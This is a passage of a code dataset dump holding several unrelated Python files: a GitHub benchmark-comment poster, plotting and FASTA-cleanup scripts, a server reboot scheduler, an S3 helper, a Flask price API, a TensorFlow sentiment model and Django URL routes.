'{}'\".format(transfer_config.name))","sub_path":"schedule.py","file_name":"schedule.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"321907587","text":"#!/usr/bin/env python3\n# Copyright 2021 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Posts benchmark results to GitHub as pull request comments.\n\nThis script is meant to be used by Buildkite for automation. 
It requires the\nfollowing environment to be set:\n\n- BUILDKITE_BUILD_URL: the link to the current Buildkite build.\n- BUILDKITE_COMMIT: the pull request HEAD commit.\n- BUILDKITE_PULL_REQUEST: the current pull request number.\n- GITHUB_TOKEN: personal access token to authenticate against GitHub API.\n\nThis script uses pip package \"markdown_strings\".\n\nExample usage:\n # Export necessary environment variables:\n export ...\n # Then run the script:\n python3 post_benchmarks_as_pr_comment.py ...\n # where each is expected to be of format expected\n # by BenchmarkResults objects.\n\"\"\"\n\nimport argparse\nimport json\nimport os\nimport requests\nimport markdown_strings as md\n\nfrom typing import Any, Dict, Sequence, Tuple, Union\n\nfrom common.benchmark_description import BenchmarkResults\n\nGITHUB_IREE_API_PREFIX = \"https://api.github.com/repos/google/iree\"\n\n\ndef get_required_env_var(var: str) -> str:\n \"\"\"Gets the value for a required environment variable.\"\"\"\n value = os.getenv(var, None)\n if value is None:\n raise RuntimeError(f'Missing environment variable \"{var}\"')\n return value\n\n\ndef get_reported_time(bench_results: Sequence[Dict[str, Any]],\n kind: str) -> int:\n \"\"\"Returns the Google Benchmark reported time for the given kind.\"\"\"\n time = None\n for bench_case in bench_results:\n if bench_case[\"name\"].endswith(f\"real_time_{kind}\"):\n if bench_case[\"time_unit\"] != \"ms\":\n raise ValueError(f\"Expected ms as time unit\")\n time = int(round(bench_case[\"real_time\"]))\n break\n if time is None:\n raise ValueError(f\"Cannot found real_time_{kind} in benchmark results\")\n return time\n\n\ndef aggregate_all_benchmarks(\n benchmark_files: Sequence[str]) -> Sequence[Tuple[Union[str, int]]]:\n \"\"\"Aggregates all benchmarks in the given files.\n\n Args:\n - benchmark_files: A list of JSON files, each can be decoded as a\n BenchmarkResults.\n\n Returns:\n - A list of (name, mean-latency, median-latency, stddev-latency) tuples.\n \"\"\"\n\n pr_commit = get_required_env_var(\"BUILDKITE_COMMIT\")\n benchmark_avg_results = {}\n\n for benchmark_file in benchmark_files:\n with open(benchmark_file) as f:\n content = f.read()\n file_results = BenchmarkResults.from_json_str(content)\n\n if file_results.commit != pr_commit:\n raise ValueError(\"Inconsistent pull request commit\")\n\n for benchmark_case in file_results.benchmarks:\n # Make sure each benchmark has a unique name.\n name = str(benchmark_case[\"benchmark\"])\n if name in benchmark_avg_results:\n raise ValueError(f\"Duplicated benchmarks: {name}\")\n\n # Now scan all benchmark iterations and find the average latency.\n mean_time = get_reported_time(benchmark_case[\"results\"], \"mean\")\n median_time = get_reported_time(benchmark_case[\"results\"], \"median\")\n stddev_time = get_reported_time(benchmark_case[\"results\"], \"stddev\")\n\n benchmark_avg_results[name] = (mean_time, median_time, stddev_time)\n\n return sorted([(k,) + v for k, v in benchmark_avg_results.items()])\n\n\ndef get_benchmark_result_markdown(benchmark_files: Sequence[str]) -> str:\n \"\"\"Gets markdown summary of all benchmarks in the given files.\"\"\"\n all_benchmarks = aggregate_all_benchmarks(benchmark_files)\n names, means, medians, stddevs = zip(*all_benchmarks)\n names = (\"Benchmark Name\",) + names\n means = (\"Average Latency (ms)\",) + means\n medians = (\"Median Latency (ms)\",) + medians\n stddevs = (\"Latency Standard Deviation (ms)\",) + stddevs\n\n build_url = get_required_env_var(\"BUILDKITE_BUILD_URL\")\n 
pr_commit = get_required_env_var(\"BUILDKITE_COMMIT\")\n\n commit = f\"@ commit {pr_commit}\"\n header = md.header(\"Benchmark results\", 3)\n benchmark_table = md.table([names, means, medians, stddevs])\n link = \"See more details on \" + md.link(\"Buildkite\", build_url)\n\n return \"\\n\\n\".join([header, commit, benchmark_table, link])\n\n\ndef comment_on_pr(content):\n \"\"\"Posts the given content as comments to the current pull request.\"\"\"\n pr_number = get_required_env_var(\"BUILDKITE_PULL_REQUEST\")\n # Buildkite sets this to \"false\" if not running on a PR:\n # https://buildkite.com/docs/pipelines/environment-variables#bk-env-vars-buildkite-pull-request\n if pr_number == \"false\":\n raise ValueError(\"Not a pull request\")\n\n api_token = get_required_env_var('GITHUB_TOKEN')\n headers = {\n \"Accept\": \"application/vnd.github.v3+json\",\n \"Authorization\": f\"token {api_token}\",\n }\n payload = json.dumps({\"event\": \"COMMENT\", \"body\": content})\n\n api_endpoint = f\"{GITHUB_IREE_API_PREFIX}/pulls/{pr_number}/reviews\"\n request = requests.post(api_endpoint, data=payload, headers=headers)\n if request.status_code != 200:\n raise requests.RequestException(\n f\"Failed to comment on GitHub; error code: {request.status_code}\")\n\n\ndef parse_arguments():\n \"\"\"Parses command-line options.\"\"\"\n\n def check_file_path(path):\n if os.path.isfile(path):\n return path\n else:\n raise ValueError(path)\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"benchmark_files\",\n metavar=\"\",\n type=check_file_path,\n nargs=\"+\",\n help=\"Path to the JSON file containing benchmark results\")\n parser.add_argument(\"--dry-run\",\n action=\"store_true\",\n help=\"Print the comment instead of posting to GitHub\")\n args = parser.parse_args()\n\n return args\n\n\ndef main(args):\n benchmarks_md = get_benchmark_result_markdown(args.benchmark_files)\n\n if args.dry_run:\n print(benchmarks_md)\n else:\n comment_on_pr(benchmarks_md)\n\n\nif __name__ == \"__main__\":\n main(parse_arguments())\n","sub_path":"build_tools/android/post_benchmarks_as_pr_comment.py","file_name":"post_benchmarks_as_pr_comment.py","file_ext":"py","file_size_in_byte":6428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"613750513","text":"import os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom glob import glob\nfrom math import factorial\nimport sis_utils\n\ndef savitzky_golay(y, window_size, order, deriv=0, rate=1):\n try:\n window_size = np.abs(np.int(window_size))\n order = np.abs(np.int(order))\n except ValueError:\n raise ValueError(\"window_size and order have to be of type int\")\n if window_size % 2 != 1 or window_size < 1:\n raise TypeError(\"window_size size must be a positive odd number\")\n if window_size < order + 2:\n raise TypeError(\"window_size is too small for the polynomials order\")\n order_range = range(order + 1)\n half_window = (window_size - 1) // 2\n # precompute coefficients\n b = np.mat([[k ** i for i in order_range] for k in range(-half_window, half_window + 1)])\n m = np.linalg.pinv(b).A[deriv] * rate ** deriv * factorial(deriv)\n # pad the signal at the extremes with\n # values taken from the signal itself\n firstvals = y[0] - np.abs(y[1:half_window + 1][::-1] - y[0])\n lastvals = y[-1] + np.abs(y[-half_window - 1:-1][::-1] - y[-1])\n y = np.concatenate((firstvals, y, lastvals))\n return np.convolve(m[::-1], y, mode='valid')\n\nimg_dir, task_dir = 
sis_utils.get_task_img_folder()\nfiles = glob(os.path.join(task_dir, '*.csv'))\nfields = ['Step', 'Value']\n\nplt.rcParams.update({'font.size': 16})\nplt.figure(figsize=(8, 4))\nfor file in files:\n df = pd.read_csv(file, skipinitialspace=True, usecols=fields)\n value = savitzky_golay(np.array(df['Value']), 11, 2)\n label_str = ''\n if 'Unet' in file:\n color_str = 'b'\n label_str += 'Unet'\n else:\n color_str = 'g'\n label_str += 'Deeplab'\n if 'xent' in file:\n lst = '--'\n label_str += ' xent'\n else:\n lst = '-'\n label_str += ' focal'\n plt.plot(np.arange(100), value, linestyle=lst, color=color_str, label=label_str)\nplt.xlabel('Epoch')\nplt.ylabel('IoU')\nplt.ylim([0.5, 0.78])\nplt.legend()\nplt.grid('on')\nplt.title('Validation IoU in Training')\nplt.tight_layout()\nplt.savefig(os.path.join(img_dir, 'focal_cmp1.png'))\nplt.show()\n","sub_path":"]tasks/2018.02.20.focal_loss/plot_focal_loss_1.py","file_name":"plot_focal_loss_1.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"449977417","text":"\n'''\nmodule : rebootBot2.py\nversion : see module_version variable\nLanguage : Python 3.x\nauthor : andrew christ\nemail : andrew@openmarmot.com\nnotes : rebootBot2 reboots servers via ssh\n\n'''\n\n\n#import built in modules\nimport time\nimport datetime\nimport os\n#import custom packages\nimport pak_mscript.mscript\nimport pak_ssh.ssh\nimport pak_fileOps.fileUtility\nimport rb2_serverObj\n\n# module specific variables\nmodule_version='0.0' #module software version\nmodule_last_update_date='May 25 2016' #date of last update\n\n#global variables\nalive=True\ndebug=True\nconfigFile='rebootBot2_config'\nserverFile='rebootBot2_servers'\nsleepTime=None\nrebootHours=[]\n\nserverList=[]\n\n\n#--------------------------------------------------\ndef main():\n\tglobal debug\n\tglobal sleepTime\n\tload()\n\n\t#tracking hours and seconds allows the sleepTime adjusted to be < 1 hour\n\t# without causing time dilation\n\taliveSeconds=0\n\taliveHours=0\n\n\n\twhile alive:\n\n\t\tif(str(datetime.datetime.today().hour) in rebootHours):\n\t\t\tfor b in serverList:\n\t\t\t\tif (b.lastReboot+b.rebootInterval)<=aliveHours:\n\t\t\t\t\treboot(b.name)\n\t\t\t\t\tb.lastReboot=aliveHours\n\n\t\tif debug:\n\t\t\tprint('Going to sleep for '+str(sleepTime)+' seconds')\n\t\ttime.sleep(sleepTime)\n\t\taliveSeconds+=sleepTime\n\t\taliveHours=int(aliveSeconds/3600)\n\n\t\tif debug:\n\t\t\tprint('aliveSeconds: '+str(aliveSeconds))\n\t\t\tprint('aliveHours: '+str(aliveHours))\n\n#--------------------------------------------------\n\n#--------------------------------------------------\ndef load():\n\tglobal configFile\n\tglobal serverFile\n\tglobal sleepTime\n\tglobal debug\n\tglobal serverList\n\tglobal rebootHours\n\n\t#spacing keeps everything from being rebooted at once\n\n\tpak_mscript.mscript.load(os.getcwd()+'/'+configFile)\n\tsleepTime=int(pak_mscript.mscript.get('sleepTime'))\n\tdebug=pak_mscript.mscript.getBool('debug')\n\trebootHours=str.split(str(pak_mscript.mscript.get('rebootHours')),',')\n\tpak_mscript.mscript.unload()\n\n\tpak_mscript.mscript.load(os.getcwd()+'/'+serverFile)\n\ttempData=pak_mscript.mscript.getDict()\n\tfor b in tempData:\n\t\tserverList.append(rb2_serverObj.server(b,0,int(tempData[b])))\n\n\tif debug:\n\t\tprint('Load complete')\n\t\tfor b in serverList:\n\t\t\tb.printSelf()\n\n\n#--------------------------------------------------\n\n#--------------------------------------------------\ndef 
reboot(serverName):\n\tif debug:\n\t\tprint('Rebooting '+serverName+' at '+time.strftime(\"%c\"))\n\tpak_fileOps.fileUtility.appendFile('log.txt',[('Rebooting '+serverName+' at '+time.strftime(\"%c\"))])\n\n\tos.system('python3 pak_ssh/reboot.py '+serverName)\n#--------------------------------------------------\n\n\nmain()\n","sub_path":"rebootBot2.py","file_name":"rebootBot2.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"120112149","text":"\n\nfrom xai.brain.wordbase.nouns._preponderance import _PREPONDERANCE\n\n#calss header\nclass _PREPONDERANCES(_PREPONDERANCE, ):\n\tdef __init__(self,): \n\t\t_PREPONDERANCE.__init__(self)\n\t\tself.name = \"PREPONDERANCES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"preponderance\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_preponderances.py","file_name":"_preponderances.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"613299644","text":"# Copyright 2019 Atalaya Tech, Inc.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nfrom urllib.parse import urlparse\n\nlogger = logging.getLogger(__name__)\n\n\ndef is_s3_url(url):\n \"\"\"\n Check if url is an s3, s3n, or s3a url\n \"\"\"\n try:\n return urlparse(url).scheme in [\"s3\", \"s3n\", \"s3a\"]\n except ValueError:\n return False\n\n\ndef create_s3_bucket_if_not_exists(bucket_name, region):\n import boto3\n from botocore.exceptions import ClientError\n\n s3_client = boto3.client('s3', region)\n try:\n s3_client.get_bucket_acl(Bucket=bucket_name)\n logger.debug(\"Found bucket %s in region %s already exist\", bucket_name, region)\n except ClientError as error:\n if error.response and error.response['Error']['Code'] == 'NoSuchBucket':\n logger.debug('Creating s3 bucket: %s in region %s', bucket_name, region)\n\n # NOTE: boto3 will raise ClientError(InvalidLocationConstraint) if\n # `LocationConstraint` is set to `us-east-1` region.\n # https://github.com/boto/boto3/issues/125.\n # This issue still show up in boto3 1.13.4(May 6th 2020)\n try:\n s3_client.create_bucket(\n Bucket=bucket_name,\n CreateBucketConfiguration={'LocationConstraint': region},\n )\n except ClientError as s3_error:\n if (\n s3_error.response\n and s3_error.response['Error']['Code']\n == 'InvalidLocationConstraint'\n ):\n logger.debug(\n 'Special s3 region: %s, will attempt create bucket without '\n '`LocationConstraint`',\n region,\n )\n s3_client.create_bucket(Bucket=bucket_name)\n else:\n raise s3_error\n else:\n raise error\n","sub_path":"bentoml/utils/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"598043526","text":"import mysql.connector\nimport numpy as np\nimport json\nfrom flask_mysqldb import MySQL\nfrom flask import jsonify\nfrom flask import request, 
Response\nfrom flask import Flask\n\napp = Flask(__name__)\n\n# Please change user and password in order to connect to mysql database\nconfig = {\n 'user': 'xxxx',\n 'password': 'xxx',\n 'host': 'localhost',\n 'database': 'gold_and_silver_price'\n}\n\n\ndef convertDateToNumber(date):\n return int(date.replace('-', ''))\n\n\n@app.route('/commodity')\ndef index():\n\n # convert date to number\n startDate = convertDateToNumber(request.args.get('start_date'))\n endDate = convertDateToNumber(request.args.get('end_date'))\n com_type = request.args.get('commodity_type')\n\n # get data from database(mysql)\n\n connection = mysql.connector.connect(\n host=config[\"host\"], database=config[\"database\"], user=config[\"user\"], passwd=config[\"password\"])\n cur = connection.cursor()\n if com_type == 'gold':\n query = 'select * from gold where numberOfDate >=%s and numberOfDate <=%s'\n else:\n query = 'select * from silver where numberOfDate >=%s and numberOfDate <=%s'\n param = (startDate, endDate)\n cur.execute(query, param)\n data = cur.fetchall()\n\n # calculate data for mean and variance\n obj = {}\n obj[\"data\"] = {}\n list = []\n for t in data:\n obj[\"data\"][t[3]] = float(t[2])\n list.append(float(t[2]))\n\n obj[\"mean\"] = round(np.mean(list), 2) # using numpy(np) to get mean\n obj[\"variance\"] = round(np.var(list), 2) # using numpy(np) to get variance\n p = json.dumps(obj, sort_keys=False, indent=1)\n res = Response(p, mimetype='application/json')\n\n return res\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port='8080')\n","sub_path":"secondProgram/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"515984560","text":"\"\"\"\nFile: modelIMDB.py\nLanguage: python3\nAuthor: Ethan David Howes \nPurpose: Build, train, and save a machine learning based\nmodel to preform sentiment analysis on lyrics\n\nModel based on the TensorFlow text classification tutorial:\nhttps://www.tensorflow.org/tutorials/text/text_classification_rnn\n\nUtilizing the Yelp polarity reviews data set provided by tensorflow\n\"\"\"\n\nimport tensorflow_datasets as tfds\nimport tensorflow as tf\n\n# Load the data set\ndataset, info = tfds.load('yelp_polarity_reviews/subwords8k', with_info=True, as_supervised=True)\n\ntrain_data, test_data = dataset['train'], dataset['test']\n\nencoder = info.features['text'].encoder\n\nBUFFER_SIZE = 1000\nBATCH_SIZE = 64\n\npadded_shapes = ([None], ())\n\ntrain_data = train_data.shuffle(BUFFER_SIZE).padded_batch(BATCH_SIZE, padded_shapes=padded_shapes)\n\ntest_data = test_data.padded_batch(BATCH_SIZE, padded_shapes=padded_shapes)\n\n# Create the recurrent model\nmodel = tf.keras.Sequential([\n tf.keras.layers.Embedding(encoder.vocab_size, 64),\n tf.keras.layers.Bidirectional(tf.keras.layers.LSTM(64)),\n tf.keras.layers.Dense(64, activation='relu'),\n tf.keras.layers.Dense(1, activation='sigmoid')\n])\n\nmodel.compile(loss='binary_crossentropy',\n optimizer=tf.keras.optimizers.Adam(1e-4),\n metrics=['accuracy'])\n\nhistory = model.fit(train_data, epochs=5, validation_data=test_data,\n validation_steps=30)\n\n# Calculate model accuracy\ntest_loss, test_acc = model.evaluate(test_data)\n\nprint('Test Loss: {}'.format(test_loss))\nprint('Test Accuracy: {}'.format(test_acc))\n\n# Save model as JSON\nmodel_json = model.to_json()\nwith open(\"modelYelp.json\", \"w\") as json_file:\n json_file.write(model_json)\n\n# Save weights as 
h5\nmodel.save_weights(\"modelYelp.h5\")\nprint(\"Saved model to disk\")\n\n# Test Loss: 0.13942851126194\n# Test Accuracy: 0.9471579194068909\n","sub_path":"Lyrics/Models/modelYelp.py","file_name":"modelYelp.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"263215182","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.contrib.auth.decorators import login_required\nfrom django.conf import settings\n\nfrom scrum.views import *\n\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n\n url(r'^$', login_required(ProjectListView.as_view()), name='projectlist'),\n url(r'^sprint/(?P[0-9]+)/$', login_required(SprintView.as_view()), name='sprint'),\n url(r'^sprint/(?P[0-9]+)/close/$', close_sprint, name='closesprint'),\n url(r'^project/(?P[0-9]+)/$', login_required(WhiteBoardView.as_view()), name='project'),\n url(r'^project/(?P[0-9]+)/update/$', login_required(update_project), name='updateproject'),\n url(r'^project/(?P[0-9]+)/story/add/$', login_required(add_story), name='addstory'),\n url(r'^project/[0-9]+/story/(?P[0-9]+)/$', login_required(update_story), name='updatestory'),\n url(r'^project/(?P[0-9]+)/task/add/$', login_required(add_task), name='addtask'),\n url(r'^project/[0-9]+/task/(?P[0-9]+)/$', login_required(update_task), name='updatetask'),\n url(r'^project/[0-9]+/sprint-task/add/$', login_required(add_sprint_task), name='updatetask'),\n url(r'^project/(?P[0-9]+)/sprint/add/$', login_required(add_sprint), name='sprintadd'),\n url(r'^project/add/$', login_required(add_project), name='addproject'),\n url(r'^task/(?P[0-9]+)/update-status/$', login_required(update_task), name='updatetaskstatus'),\n\n url(r'^login/?$', 'django.contrib.auth.views.login', {'template_name': 'scrum/registration/login.html', }, name='login'),\n url(r'^logout/$', 'django.contrib.auth.views.logout', {'template_name': 'scrum/registration/logged_out.html', }, name='logout'),\n)\n\nurlpatterns += patterns('',\n (r'^static/(.*)$', 'django.views.static.serve', {\n 'document_root': settings.STATIC_ROOT\n }),\n)\n","sub_path":"agile_board/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"46659423","text":"#! 
python 3\n\n\nimport time, os, shutil, send2trash\n\n\nLOCATION1 = \"C:\\\\Users\\\\Steven Vill\\\\Desktop\\\\Desktop\\\\newone\\\\SuperProjects\\\\\"\nLOCATION2 = \"C:\\\\Users\\\\Steven Vill\\\\Desktop\\\\Desktop\\\\newone\\\\SuperProjects\\\\fileFrog\\\\\"\nLOCATION3 = \"C:\\\\Users\\\\Steven Vill\\\\Desktop\"\n\n\n\"\"\"\nstrMyDir = os.getcwd()\n\n\ndef chdir_copy(f): #f = a file to copy\n os.chdir(LOCATION1)\n print(strMyDir)\n shutil.copy(LOCATION1 + f, LOCATION2)\n time.sleep(1.5)\n\ndef chdir_copy_tree(f): #f = a folder to copy\n os.chdir(LOCATION1)\n print(strMyDir)\n shutil.copytree(f, LOCATION2 + \"_backUP\") #_backUP: name of new file crated\n time.sleep(1.5)\n\n\ndef chdir_move(f,l): #f = a file to move l = location\n\n shutil.move( f, l)\n time.sleep(1.5)\n\n\n\n\nfile1 = \"play.py\"\nfile2 = \"functions.py\"\n#chdir_copy(file1)\n#chdir_copy(file2)\nfolder1 = LOCATION1 + \"c#Basics\"\n#chdir_copy_tree(folder1)\n\nchdir_move(file1, LOCATION3)\nchdir_move(LOCATION3+file1, LOCATION1)\n#chdir_move()\n\n\n\n\n\nbeaconFile = open('beacon.txt', 'a')\nbeaconFile.write('wadw dwdwdds dfdfddfd d fdf')\ntime.sleep(2)\nbeaconFile.close()\nsend2trash.send2trash('beacon.txt') # send to trash function\n\n\"\"\"\n\n#walking through a dir os.walk return 3 outputs foldername, subfoldername, filenames\nimport os\nx =0\n\nfor folderName, subfolders, filenames in os.walk(LOCATION3):\n print('The current folder is ' + folderName)\n\n for subfolder in subfolders:\n print('SUBFOLDER OF ' + folderName + ': ' + subfolder)\n for filename in filenames:\n print('FILE INSIDE ' + folderName + ': '+ filename)\n\n print(\"#cls\"*len(LOCATION3))\n x+=1\n if x == 10: break\n\n ","sub_path":"notes.py","file_name":"notes.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"438271044","text":"from __future__ import annotations\nfrom enum import Enum\nfrom typing import List, Tuple, Optional\nfrom cards import Card\n\n\nclass Player:\n \"\"\"\n Represents a Player in a poker game.\n \"\"\"\n\n def __init__(self, player_name: str = None, player_id: str = None):\n assert player_name is not None\n assert player_id is not None\n\n self.name: str = player_name\n self.id: str = player_id\n\n self._chips: int = 0\n self._pocket_cards: List[Card, Card] = []\n\n def clear_pocket_cards(self):\n self._pocket_cards.clear()\n\n def set_pocket_cards(self, cards: List[Card]):\n assert len(cards) == 2, \"player can only be given 2 pocket cards\"\n self._pocket_cards.clear()\n self._pocket_cards.extend(cards)\n\n\nclass PlayerAction:\n\n class ActionType:\n CHECKFOLD = 1\n FOLD = 2\n CHECK = 3\n SEE = 4\n RAISE = 5\n\n def __init__(self):\n self.action: PlayerAction.ActionType = PlayerAction.ActionType.CHECKFOLD\n self.value: int = 0\n","sub_path":"poker/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"595943089","text":"# Author: Garret Kern\r\n#\r\n# Modifications by Josh Cherry 2/16/19:\r\n#\r\n# 1. Fixed bug affecting cleaning of csv files.\r\n# 2. Show user example tag field values (two for each, taken from first\r\n# and last sequence).\r\n# 3. When exiting upon error, wait for user to press return before exiting.\r\n# Also, exit 0 for success, 1 for failure\r\n# 4. Allow .fa in addition to .fas, and check that these are at end of fname.\r\n# 5. 
Cosmetic changes: spelling, etc.\r\n\r\n# Imports\r\nimport time\r\nimport sys\r\nimport random\r\nimport math\r\n\r\n\r\n# Quit script after short delay\r\ndef quit_success():\r\n print(\"---Script Done---\")\r\n time.sleep(4)\r\n sys.exit(0)\r\n\r\ndef quit():\r\n _ = input('Error in processing; press RETURN to exit: ')\r\n sys.exit(1)\r\n \r\n# Read file for input\r\ndef inputFile(name):\r\n pathname = input(\"Filepath for \" + name\r\n + \" (must be .fa (or .fas) or .csv format): \")\r\n try:\r\n # inputFile = open(pathname, \"r\", encoding=\"utf8\")\r\n inputFile = open(pathname, \"r\")\r\n except Exception:\r\n print(\"File does not exist\")\r\n quit()\r\n try:\r\n inputLines = inputFile.readlines()\r\n except Exception:\r\n inputFile.close()\r\n inputFile = open(pathname, \"r\", encoding=\"utf8\")\r\n inputLines = inputFile.readlines()\r\n\r\n inputFile.close()\r\n\r\n if (\".csv\" in pathname):\r\n splitChar = \",\"\r\n elif (pathname.endswith('.fa') or pathname.endswith('.fas')):\r\n splitChar = \"|\"\r\n else:\r\n print(\"Invalid file extension, must be \\\r\n .csv, .fa, or .fas (the last two equivalent)\")\r\n quit()\r\n return (inputLines,splitChar)\r\n\r\n\r\n# Output to a File\r\ndef outputFile(outputLines):\r\n pathname = input(\"Filepath for output (will create a new file if none exist): \")\r\n outputFile = open(pathname, \"w\")\r\n for line in outputLines:\r\n outputFile.write(line)\r\n outputFile.close()\r\n\r\n\r\n# Remove illgal fasta chars\r\ndef replaceIllegalChars(toChange):\r\n return toChange.rstrip().replace(\":\",\"\").replace(\"(\",\"_\").replace(\")\",\"_\").replace(\" \",\"_\").replace(\"\\'\",\"\").replace(\"\\\"\", \"\")\r\n\r\n\r\n# Format input onto one line\r\n# Can take lines from .fas or .csv file\r\ndef formatInput(inputLines, splitChar):\r\n\r\n # Reformat for analysis\r\n newLines = []\r\n curSequence = replaceIllegalChars(inputLines[0])\r\n count = 0\r\n for line in inputLines[1:]:\r\n if (\">\" in line):\r\n newLines.append(curSequence + \"\\n\")\r\n curSequence = replaceIllegalChars(line)\r\n count = 0\r\n else:\r\n if (count == 0):\r\n curSequence = curSequence + splitChar\r\n curSequence = curSequence + line.rstrip()\r\n count+=1\r\n # Add final line, not added by for loop\r\n newLines.append(curSequence + \"\\n\")\r\n inputLines = newLines\r\n return inputLines\r\n\r\n\r\n# Format output to .fas format\r\ndef outputToFas(outputLines, splitChar):\r\n # Return to fasta format\r\n formatOutput = []\r\n for line in outputLines:\r\n tags = \"|\".join(line.rstrip().split(splitChar)[:-1])\r\n sequence = line.rstrip().split(splitChar)[-1]\r\n formatOutput.append(tags + \"\\n\")\r\n count = 0\r\n chunk = \"\"\r\n for char in sequence:\r\n count += 1\r\n chunk = chunk + char\r\n if count == 60:\r\n formatOutput.append(chunk + \"\\n\")\r\n chunk = \"\"\r\n count = 0\r\n if len(chunk) != 0:\r\n formatOutput.append(chunk + \"\\n\")\r\n\r\n return formatOutput\r\n\r\n\r\nclass Review:\r\n\r\n def findMedianLength(inputLines):\r\n\r\n lens = []\r\n\r\n for line in inputLines:\r\n tagLen = len(line.split(Review.splitChar))\r\n lens.append(tagLen)\r\n\r\n return lens[int(len(lens)/2)]\r\n\r\n\r\n def findBadChars(inputLines):\r\n validLines = []\r\n\r\n for line in inputLines:\r\n if \"\\\"\" in line:\r\n print(\"Line: \" + str(line.split(Review.splitChar)[0]) + \" contains a quotation\")\r\n elif \"(\" in line:\r\n print(\"Line: \" + str(line.split(Review.splitChar)[0]) + \" contains a paren\")\r\n elif \" \" in line:\r\n print(\"Line: \" + 
str(line.split(Review.splitChar)[0]) + \" contains a space\")\r\n elif (\",\" in line) and (Review.splitChar == \"|\"):\r\n print(\"Line: \" + str(line.split(Review.splitChar)[0]) + \" contains a comma\")\r\n else:\r\n validLines.append(line)\r\n\r\n return validLines\r\n\r\n\r\n def findLongLines(inputLines):\r\n median = Review.findMedianLength(inputLines)\r\n validLines = []\r\n\r\n for line in inputLines:\r\n tagLen = len(line.split(Review.splitChar))\r\n if not(tagLen == median):\r\n print(\"Line: \" + str(line.split(Review.splitChar)[0]) + \" has an incorrect number of tags\")\r\n else:\r\n validLines.append(line)\r\n\r\n return validLines\r\n\r\n\r\n def start():\r\n print(\"*** Starting File Reviewer ***\")\r\n print(\"** Find lines with the wrong number of tags and illegal characters **\")\r\n\r\n # Read input\r\n (inputLines, Review.splitChar) = inputFile(\"input\")\r\n inputLines = formatInput(inputLines, Review.splitChar)\r\n\r\n inputLines = Review.findBadChars(inputLines)\r\n inputLines = Review.findLongLines(inputLines)\r\n\r\n # format output\r\n outputLines = outputToFas(inputLines, Review.splitChar)\r\n # Print good lines to output file\r\n outputFile(outputLines)\r\n\r\n# Cleanup .fas or .csv file\r\nclass Cleanup:\r\n\r\n splitChar = \"\"\r\n\r\n def readCarefully(inputLines):\r\n threshold = float(input(\"Percent of total lines that must have a nucelotide in the column (enter .7 for 70%): \"))\r\n numLines = 0\r\n sequenceDict = {}\r\n curCharDict = {}\r\n\r\n\r\n for line in inputLines:\r\n if (\">\" in line):\r\n id = line\r\n sequenceDict[id] = \"\"\r\n numLines += 1\r\n\r\n colCount = 0\r\n repeat = True\r\n\r\n while(repeat):\r\n # repeat as long as any lines have nucleotides in the colCount position\r\n repeat = False\r\n # count the number of valid nucleotides across all lines in a specific column\r\n nucCount = 0\r\n\r\n for line in inputLines:\r\n if (\">\" in line):\r\n lineCounter = 0\r\n id = line\r\n else:\r\n lineCounter += len(line)\r\n if not(colCount > lineCounter):\r\n curChar = line[colCount - lineCounter]\r\n if (curChar != \"-\"):\r\n nucCount += 1\r\n repeat = True\r\n curCharDict[id] = curChar\r\n\r\n if (nucCount >= threshold * numLines):\r\n for line in inputLines:\r\n if (\">\" in line):\r\n id = line\r\n sequenceDict[id] += curCharDict[id]\r\n colCount += 1\r\n\r\n inputLines = []\r\n\r\n for sequenceId in sequenceDict.keys():\r\n print(sequenceId + Cleanup.splitChar + sequenceDict[sequenceId])\r\n inputLines.append(sequenceId + Cleanup.splitChar + sequenceDict[sequenceId])\r\n\r\n return inputLines\r\n\r\n # Remove duplicates\r\n def removeDuplicates(inputLines):\r\n lineTags = [] # list of 